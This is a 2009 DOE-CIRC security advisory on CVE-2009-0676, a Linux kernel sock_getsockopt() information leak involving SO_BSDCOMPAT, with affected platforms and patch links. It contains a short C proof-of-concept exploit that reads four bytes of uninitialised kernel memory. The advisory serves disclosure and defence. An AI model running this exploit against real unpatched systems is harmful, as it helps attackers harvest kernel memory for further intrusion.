
DOE-CIRC TECHNICAL BULLETIN

T-145: Linux Kernel 'sock.c' SO_BSDCOMPAT Option Information Disclosure Vulnerability

[CVE-2009-0676]

May 28, 2009 14:00 GMT

PROBLEM: The Linux Kernel is prone to an information-disclosure vulnerability because it fails to properly initialize certain memory before using it in a user-accessible operation.
PLATFORM: Ubuntu Linux 8.10 sparc and all previous versions
          S.u.S.E. SLES 11 DEBUGINFO and all previous versions
          rPath Linux 2 and all previous versions
          RedHat Enterprise Linux 5 server and all previous versions
          MandrakeSoft Linux Mandrake 2009.0 and all previous versions
          Versions prior to Linux Kernel 2.6.28.8 are vulnerable
          Debian Linux 5.0 sparc and all previous versions
ABSTRACT: Specifically, the vulnerability resides in the 'sock_getsockopt()' function of the 'net/core/sock.c' source file. The variable 'optval v.val' isn't initialized and four bytes of data may be directly returned to an attacker if the SO_BSDCOMPAT option is set.

LINKS:
  DOE-CIRC BULLETIN: http://www.doecirc.energy.gov/bulletins/t-145.shtml
  OTHER LINKS:
    Security Focus: http://www.securityfocus.com/bid/33846/info
    Juniper: http://www.juniper.net/security/auto/vulnerabilities/vuln33846.html

CVE: CVE-2009-0676

[***** Start CVE-2009-0676 *****]

Discussion:
The Linux Kernel is prone to an information-disclosure vulnerability because it fails to properly initialize certain memory
before using it in a user-accessible operation. Specifically, the vulnerability resides in the 'sock_getsockopt()' function
of the 'net/core/sock.c' source file. The variable 'optval v.val' isn't initialized and four bytes of data may be directly
returned to an attacker if the SO_BSDCOMPAT option is set.
Successful exploits will allow attackers to view portions of kernel memory. Information harvested may be used in further
attacks.

The following exploit code is sufficient to demonstrate this issue:

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>

int main(void)
{
    unsigned char buf[4] = { 0, 0, 0, 0 };
    socklen_t len = sizeof(buf);   /* must be initialised: the kernel reads the length from user space */
    int sock;

    /* family 33, type 2, protocol 2 as in the original; level 1 is SOL_SOCKET */
    sock = socket(33, 2, 2);
    getsockopt(sock, 1, SO_BSDCOMPAT, buf, &len);
    printf("%x%x%x%x\n", buf[0], buf[1], buf[2], buf[3]);
    close(sock);
    return 0;
}

Solution:
Updates are available. Please see the links below for more information.

http://www.securityfocus.com/bid/33846/solution
http://patchwork.kernel.org/patch/6816/


[***** End CVE-2009-0676 *****]

DOECIRC services are available to DOE, DOE Contractors, and the NIH. DOE-CIRC can be contacted at:
    Voice:          866-941-2472
    E-mail:          doecirc@doecirc.energy.gov
    World Wide Web:  http://www.doecirc.energy.gov
                   


UCRL-MI-119788
IMPACT ASSESSMENT: This risk is medium. Successful exploits will allow attackers to view portions of kernel memory.